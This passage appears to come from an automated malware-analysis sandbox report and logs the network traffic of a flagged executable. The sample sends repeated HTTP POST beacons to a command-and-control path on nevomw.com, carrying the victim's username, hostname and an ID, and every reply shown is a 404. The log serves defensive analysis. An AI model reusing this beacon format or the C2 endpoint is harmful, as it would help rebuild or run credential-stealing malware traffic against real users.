                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.035990000 CET209OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.107873917 CET209INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            54192.168.2.64977045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:07.369520903 CET210OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.422445059 CET210OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.495950937 CET211INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            55192.168.2.64977145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:07.847165108 CET212OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:07.900952101 CET212OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:07.981039047 CET212INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            56192.168.2.64977245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:10.181925058 CET213OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:10.236537933 CET213OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:10.313579082 CET214INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            57192.168.2.64977345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:10.569443941 CET215OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:10.633315086 CET215OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:10.708132982 CET215INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            58192.168.2.64977445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:11.023775101 CET216OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:11.075879097 CET216OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:11.152570009 CET217INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            59192.168.2.64977545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:11.449891090 CET217OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:11.502696991 CET218OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:11.577105045 CET218INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.64971845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:44.367507935 CET67OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:44.424026966 CET67OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:44.495388985 CET67INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            60192.168.2.64977645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:11.948579073 CET219OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.003648996 CET219OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.076914072 CET220INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            61192.168.2.64977845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:12.388055086 CET281OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.440466881 CET281OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.513309956 CET281INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            62192.168.2.64977945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:12.790592909 CET283OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:12.842472076 CET283OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:12.934709072 CET290INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            63192.168.2.64978145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:13.252512932 CET374OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:13.304941893 CET375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:13.381217003 CET382INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            64192.168.2.64978345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:13.692641020 CET411OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:13.746243000 CET422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:13.819813967 CET434INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            65192.168.2.64978745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:14.113854885 CET482OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.166322947 CET483OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:14.244582891 CET491INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            66192.168.2.64978945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:14.503417969 CET555OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.555636883 CET556OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:14.657265902 CET565INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            67192.168.2.64979145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:14.917886019 CET645OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.981981039 CET646OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.077527046 CET648INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            68192.168.2.64979345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:15.377621889 CET833OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:15.432190895 CET833OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.504591942 CET835INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            69192.168.2.64979545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:15.761208057 CET846OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:15.813211918 CET853OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.888012886 CET855INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.64972045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:44.817785978 CET69OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:44.872364044 CET74OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:44.947917938 CET77INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            70192.168.2.64979745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:16.124828100 CET1052OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
